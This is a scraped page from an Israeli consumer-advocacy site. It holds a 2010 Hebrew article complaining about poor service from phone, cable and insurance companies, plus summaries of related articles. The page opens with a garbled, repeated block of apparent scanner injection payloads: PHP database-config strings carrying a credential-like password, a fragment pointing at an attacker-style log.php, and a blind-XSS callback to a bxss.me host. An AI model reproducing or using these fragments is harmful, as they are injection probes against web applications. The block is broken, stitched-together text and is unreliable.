$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> קיבלת שירות לקוי? הגענו בגלל המחיר עזבנו בגלל השירות
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

הגענו בגלל המחיר עזבנו בגלל השירות...

תאריך: 08/08/2010 14:14   מחבר: מערכת האתר

מדינת ישראל מובילה בדירוג העולמי בתחומי הפיתוח, הרפואה, טכנולוגיה, ביטחון ועוד. בתחום אחד יש לה הרבה מה ללמוד ממדינות העולם המתוקנות. ספקי השירותים באשר הם לא יודעים  איך לתת שירות הוגן, אדיב ומקצועי לצרכן, שבזכותו הם קיימים מבחינה עסקית וכלכלית.

כאשר חברות הסלולר, הכבלים, הביטוח, הבנקים, קופות חולים, בתי חולים ומי בעצם לא, מעוניינים למכור לנו את המוצרים שלהם, הם יודעים לחזר אחרינו ולפתות אותנו בחבילות אטרקטיביות. אנו האזרחים נכנעים להצעות המחיר המפתות ונקשרים בהסכם עם החברות השונות. החיובים יורדים בזמן. החברות לא מפסידות. הם מקבלות את ליטרת הבשר שלהם לפי הוראת החיוב עליה חתמנו. והינה מגיע היום בו יש תקלה.

הטלפון לא עובד, מהירות הגלישה נמוכה, אין חיבור לאינטרנט, מגיע לנו כסף מחברת הביטוח בגין אירוע ביטוחי של אובדן המזוודה בחזרה מחו"ל ועוד. אנו הצרכנים באים לתבוע את זכותנו בדין ובצדק. וכאן מתחיל נתיב הייסורים, בדרך למימוש זכותנו האלמנטארית.

מה עושים? מתחילים להתקשר לחברה ולספקים הנוגעים בדבר. עד שאתה מגיע למענה אנושי אתה נדרש להקיש סדרה של ספרות שכל אחת מהן מפנה אותך לבעל תפקיד אחר. לאחר המתנה ממושכת ומורטת עצבים, עונה לך נציגה מותשת ושחוקה שלא תמיד מבינה מה אתה מטריד אותה בצהרי היום.

"סגרנו על מחיר מבצע ואתם גובים ממנו יותר ממה שסוכם", אתה מתלונן. והנציגה מדקלמת תשובה מוכנה. "אדוני, המבצע נגמר והמחיר השתנה בהתאם". "אז למה לא הודעתם לי שהוא נגמר" אתה שואל.  "היית צריך לעקוב לבד" עונה הנציגה בנחישות ולא ברגישות. אתה מיואש. צועק. מאיים לעבור לחברה אחרת. אין עם מי לדבר. 

בחברות הביטוח המצב לא יותר טוב. הפרמיות נגבות בזמן. חסר לך אם אתה מתעכב בתשלום. מפציצים אותך בתזכורות. אבל כאשר אתה מגיש תביעה לגיטימית כמבוטח, הנשמה יוצאת עד שאתה רואה תמורה לתביעתך. זו הסיבה שלאימרה הצינית והביקורתית " באנו בגלל המחיר עזבנו בגלל השירות" יש תמיכה מקיר לקיר בקרב ציבור המבוטחים.

מעובדי הציבור שאת משכורתם אנו משלמים, אנו מצפים לתודעת שירות ונכונות לסייע לאזרח ההולך לאיבוד בסבך הביורוקראטי. הציפיות במרבית המפגשים עם משרתי הציבור מאכזבות. הם כנראה נהנים מהתלות שלנו בהם.

לנו זה נמאס. אנו מאמינים שאסור להשלים עם התופעה. באמצעות האתר "ישראל אחרת", אנו נעקוב ונדווח על ליקויים בשירות הפרטי והציבורי. אנו מאמינים שחשיפת הליקויים בשירות, יגבירו את המודעות הצרכנית ויגרמו לאזרחים שלא לוותר על זכותם הבסיסית לקבל את התמורה המלאה לכספם.

קיראו מידע ומאמרים נוספים באתר
מדרג חברות ביטוח לפי תלונות ציבור המבוטחים - המפקח על הביטוח פרסם דוח מיוחד בו מפרט את מדרג חברות הביטוח לפי ממצאי בדיקת התלונות שהוגשו במהלך שנת 2008. מהשוואת כל ענפי הביטוח עולה כי מבין חמש חברות הביטוח הגדולות בשוק, היחס הטוב ביותר ללקוח ניתן בחברת הביטוח הראל, והיחס הגרוע ביותר - בחברת הביטוח הפניקס
הוט – חברת הכבלים המשיכה לחייב מנוי שהלך לעולמו - בית המשפט לתביעות קטנות בחיפה קבע לאחרונה שעל חברת הכבלים הוט לפצות בני-משפחה אחת, לאחר שגבו תשלום במשך חודשים מאדם שהלך לעולמו.
המתנה מתסכלת של לקוחות למענה במוקדי השירות והמכירות - בבדיקה שערך "גלובס" במוקדי השירות של 14 חברות שלקוחותיהן נדרשים לשירות בתדירות גבוהה יחסית, נמצאו לרוב פערים קיצוניים בין זמני ההמתנה לנציג מכירות ולנציג שירות לקוחות
למה אנו הלקוחות מקבלים שירות גרוע מחברות התקשורת - "גלובס" חושף בתחקיר מיוחד שערך בקרב נציגי שירות לקוחות בחברות תקשורת ואינטרנט את הסיבות בגינן אנו הלקוחות זוכים ליחס לא מקצועי ולא איכותי מצד נציגי השירות באשר הם
"מר אדון טיפש", כך נכתב על חשבונית של לקוח חברת פרטנר - סמיר שמחייב, רכש טלפון מחברת פרטנר. בעקבות תקלות חוזרו ונשנות ביקש לבטל את הקו. בחברה לא אהבו את הבקשה. בחשבון הסופי שנשלח אליו נרשם במקום המיועד לשם הלקוח " מר אדון טיפש"
ספקי שירותי נופש מפרסמים מודעות העלולות להטעות צרכנים - המוצעה לצרכנות ערכה תחקיר שבדק את האמת בפרסום כפי שעולה ממודעות ספקי שירותי נופש ומצאה כי המחיר בפועל לא דומה למחיר הנקוב בפרסום ועלול להטעות את ציבור הלקוחות.
שובר של כרטיס אשראי יכול להתגלגל כמו צ'ק לצד שלישי - רכשנו מוצר מסוים,שילמנו עליו בצ'ק ורצינו להבטיח שהצ'ק לא יגולגל מהספק הישיר לצד שלישי אז רשמנו על השק "לא סחיר" ו"למוטב בלבד". מה קורה אם אנו משלמים באמצעות כרטיס אשראי, האם אנו בטוחים שאמצעי תשלום זה, לא יגולגל כמו צ'ק לצד שלישי ? כנראה שלא.
תביעה ייצוגית כנגד החברה המשווקת את מגה גלופלקס - בית המשפט המחוזי בתל אביב אישר הגשת תביעה ייצוגית בסך כ מיליארד שקל נגד חברת טיעם טבע אלטמן המשווקת את תוסף המזון מגה גלופלקס בחשד להטעיית הציבור בפרסום הנוגע לסגולות המוצר
שיטות הפעולה המיוחדות של "אוסקר" החברה להחזרי מס - לפי תחקיר "גלובס"חברת אוסקר ניהול ושיווק פיננסי עוסקת מזה שנים בהחזרי מס לשכירים ממס הכנסה. לקוחות רבים התלוננו על דרכי פעולה לא תקינות של החברה מה שגורם לכאורה, להוצאת כספים במרמה.
פרסומים מטעים במחירי טיסות וחבילות נופש - מתלונות שהגיעו למועצה הישראלית לצרכנות עולה כי ספקי תיירות מפרסמים באתרי האינטרנט מחירי טיסות וחבילות נופש שאינם נכונים וגורמים להטעיית הציבור
תו אמון הציבור נשלל מרשת מחסני חשמל - בעקבות תלונות רבות של צרכנים כנגד מוצרים ושירות לקויים של רשת מחסני חשמל נשלל ממנה תו אמון הציבור שמוענק על ידי המוסד אמון הציבור
מחפשים זוגיות מתלוננים כנגד אתרי היכרויות ומשרדי שידוכים - לפי דוח אמון הציבור עולה כי תלונות רבות הגיעו לטיפולו כנגד אתרי היכרויות ומשרדי שידוכים בכל הקשור לביטול עסקה, הבטחות שווא, שירות לקוי וכבילה חוזית
מכשירי ניווט - מי אחראי לטעויות? - ניר נחשון ניצל מלינץ'. כפי שפורסם, נחשון הינו נפגע נוסף מטעות במכשיר ניווט. על פי הפירסומים, נכנס נחשון לכפר עיסאווייה שבמזרח ירושלים בגלל טעות במכשיר הניווט שברשותו. אין זו הפעם הראשונה בה טעות במכשיר הניווט גורמת לנהג לככב בסרט אימה. עורכי הדין ורד כהן ורענן בר-און מסבירים את ההשלכות המשפטיות הנובעות מאירוע זה
עלייה חדה במספר התלונות של צרכנים נגד יצרנים וחברות - לפי בדיקות של המועצה הישראלית לצרכנות חל גידול של 40 אחוז במספר התלונות בשנת 2011 כנגד, יצרנים, ספקים, חברות תקשורת ונותני שירותים